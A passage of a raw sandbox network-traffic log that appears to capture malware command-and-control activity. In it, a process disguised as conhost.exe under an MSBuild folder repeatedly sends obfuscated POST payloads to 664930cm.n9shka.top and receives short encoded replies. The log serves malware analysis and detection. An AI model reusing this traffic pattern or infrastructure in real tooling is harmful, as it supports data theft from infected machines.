                                                          Data Ascii: XWZ\\ETR\XWZTRU[YRYYPYVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"- !;=!%_'12^;\,0#V$=;%!&U1?" T()!F/'P,
                                                          Oct 1, 2024 05:58:07.306022882 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:07.712416887 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P
                                                          Oct 1, 2024 05:58:07.712651968 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.64975137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:07.843995094 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:08.199726105 CEST1120OUTData Raw: 58 55 5a 5b 59 42 54 50 5c 58 57 5a 54 5c 55 50 59 5a 59 5f 50 5f 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XUZ[YBTP\XWZT\UPYZY_P_VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.07S"+*29]&-.&8(- ?'= S1Q&7:+"$U*9!F/'P,
                                                          Oct 1, 2024 05:58:08.450721979 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:08.581130981 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.64975237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:08.702168941 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:09.059089899 CEST1120OUTData Raw: 58 56 5a 59 59 45 51 53 5c 58 57 5a 54 58 55 5c 59 55 59 56 50 5a 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XVZYYEQS\XWZTXU\YUYVPZVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-<!?=^&.&#],373(1)&4-<T()!F/'P,%
                                                          Oct 1, 2024 05:58:09.308294058 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:09.467139006 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.64975337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:09.600423098 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:09.949620008 CEST1120OUTData Raw: 58 54 5f 5e 59 48 54 55 5c 58 57 5a 54 5d 55 51 59 5a 59 5f 50 50 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_^YHTU\XWZT]UQYZY_PPVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,3<!>)Z3.Z&++,U 0.4P&=%^?"$+9!F/'P,1
                                                          Oct 1, 2024 05:58:10.234700918 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:10.371033907 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.64975437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:10.497617006 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:10.860961914 CEST1120OUTData Raw: 5d 56 5a 5f 59 41 54 50 5c 58 57 5a 54 58 55 5b 59 5a 59 5f 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ_YATP\XWZTXU[YZY_P_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#S6<\)&$5&(]-3+T'8%&&9<2()!F/'P,%
                                                          Oct 1, 2024 05:58:11.090171099 CEST1120OUTData Raw: 5d 56 5a 5f 59 41 54 50 5c 58 57 5a 54 58 55 5b 59 5a 59 5f 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ_YATP\XWZTXU[YZY_P_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#S6<\)&$5&(]-3+T'8%&&9<2()!F/'P,%
                                                          Oct 1, 2024 05:58:11.402621031 CEST1120OUTData Raw: 5d 56 5a 5f 59 41 54 50 5c 58 57 5a 54 58 55 5b 59 5a 59 5f 50 5f 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZ_YATP\XWZTXU[YZY_P_VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#S6<\)&$5&(]-3+T'8%&&9<2()!F/'P,%
                                                          Oct 1, 2024 05:58:11.716557026 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:11.716583967 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:11.716593027 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:11.968523979 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.64975537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:12.095127106 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.64975637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:12.284267902 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1820
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:12.637193918 CEST1820OUTData Raw: 58 54 5f 5d 59 42 51 52 5c 58 57 5a 54 52 55 5a 59 5a 59 58 50 59 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_]YBQR\XWZTRUZYZYXPYVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-#+R";=".3.>2;8-0(04%*22<1;+!F/'P,
                                                          Oct 1, 2024 05:58:12.893801928 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:13.021226883 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 00 24 37 22 56 20 3c 3d 5b 29 3c 20 02 27 37 27 16 3a 13 33 1c 31 3c 28 03 2c 22 39 03 2b 3a 22 5a 32 00 2b 13 25 21 35 0c 30 36 20 5f 0d 10 21 00 21 16 2a 56 38 29 23 5c 3e 21 28 0a 32 0e 3c 04 24 0d 29 0a 2b 07 38 1c 26 2c 29 1f 30 3f 3a 52 2e 25 3f 03 29 34 38 57 23 11 2d 56 02 1e 22 51 26 01 39 54 34 59 25 14 27 16 2c 5f 20 28 26 0f 3e 3e 24 5d 30 34 3e 5c 3d 03 0a 02 3c 2c 34 07 23 2a 0b 5f 34 31 25 1a 33 23 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &$7"V <=[)< '7':31<(,"9+:"Z2+%!506 _!!*V8)#\>!(2<$)+8&,)0?:R.%?)48W#-V"Q&9T4Y%',_ (&>>$]04>\=<,4#*_41%3#'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.64975737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:12.405754089 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:12.762170076 CEST1120OUTData Raw: 5d 51 5a 59 59 45 54 50 5c 58 57 5a 54 5a 55 5a 59 5a 59 59 50 51 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]QZYYETP\XWZTZUZYZYYPQVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!:3 !([>!!\$=61 /3/S37&"=%'.?" +)!F/'P,-
                                                          Oct 1, 2024 05:58:13.032345057 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:13.170599937 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.64975837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:13.318944931 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:13.669439077 CEST1120OUTData Raw: 5d 51 5f 5e 59 43 51 55 5c 58 57 5a 54 58 55 5b 59 53 59 5b 50 5f 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]Q_^YCQU\XWZTXU[YSY[P_VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-#T"8[>Z$>2(-3(3X;%1&4)?2#+!F/'P,%
                                                          Oct 1, 2024 05:58:13.930177927 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:14.058001041 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.64975937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:14.186798096 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:14.543723106 CEST1112OUTData Raw: 5d 51 5f 5d 5c 42 51 55 5c 58 57 5a 54 5b 55 5b 59 53 59 59 50 5d 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]Q_]\BQU\XWZT[U[YSYYP]VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,3(584[>!)['="_%#_8 7%>$2!&4=(24(!F/'P,!
                                                          Oct 1, 2024 05:58:14.821423054 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:14.956448078 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.64976037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:15.092366934 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:15.449654102 CEST1120OUTData Raw: 58 55 5f 59 59 42 51 52 5c 58 57 5a 54 5a 55 59 59 51 59 59 50 5d 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU_YYBQR\XWZTZUYYQYYP]VE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,#/U"+?=-01#Y;7U3='&1W2B%(?(!F/'P,-
                                                          Oct 1, 2024 05:58:15.729161978 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:16.022836924 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P
                                                          Oct 1, 2024 05:58:16.078463078 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.64976137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:16.264693975 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:16.621526003 CEST1112OUTData Raw: 58 50 5f 5f 5c 45 51 51 5c 58 57 5a 54 5b 55 5b 59 52 59 57 50 51 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XP__\EQQ\XWZT[U[YRYWPQVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\,#45+*2'>&^#/U+S%-<%2.Q&$>+8T(9!F/'P,!
                                                          Oct 1, 2024 05:58:16.870326042 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:16.997250080 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.64976237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:17.122769117 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:17.480849028 CEST1120OUTData Raw: 58 50 5f 5f 59 45 54 5f 5c 58 57 5a 54 53 55 5d 59 57 59 56 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XP__YET_\XWZTSU]YWYVPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-#?"+)9[$22^ 8#3+%2&4&]<2?*)!F/'P,
                                                          Oct 1, 2024 05:58:17.728247881 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:17.861299038 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.64976337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:17.994857073 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
